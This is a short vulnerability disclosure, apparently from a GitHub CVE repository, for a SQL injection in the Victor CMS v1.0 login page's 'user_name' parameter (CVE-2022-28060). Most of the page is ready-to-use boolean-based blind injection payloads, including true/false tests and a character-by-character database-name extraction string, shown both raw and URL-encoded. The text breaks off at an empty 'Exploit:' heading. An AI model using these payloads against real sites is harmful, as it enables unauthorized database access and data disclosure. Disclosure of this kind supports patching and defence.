CVE-2022-28060: CVE/VictorCMS SQL.md at main · JiuBanSec/CVE

Permalink

• VULNERABLE: SQL injection vulnerability exists in VictorCMS . An attacker can inject query in “/CMSsite/includes/login.php" via the “user_name” parameters.

• Product: Victor CMS v1.0

• Impact: Allow attacker inject query and access , disclosure of all data on the system.

• Payload Boolean true: test’ or '1’=’1

• Payload Boolean false: test’ or '1’=’2

• Payload exploit example: test’ or (ascii(substr((select(database())),1,1))<127)–±

• Proof of concept (POC):

• You see Whether the user name is correct or not, the response status of the returned package is different

• Payload Boolean true: user_name=test’+or+’1’=’1

• Payload Boolean false: user_name=test’+or+’1’=’2

• Exploit: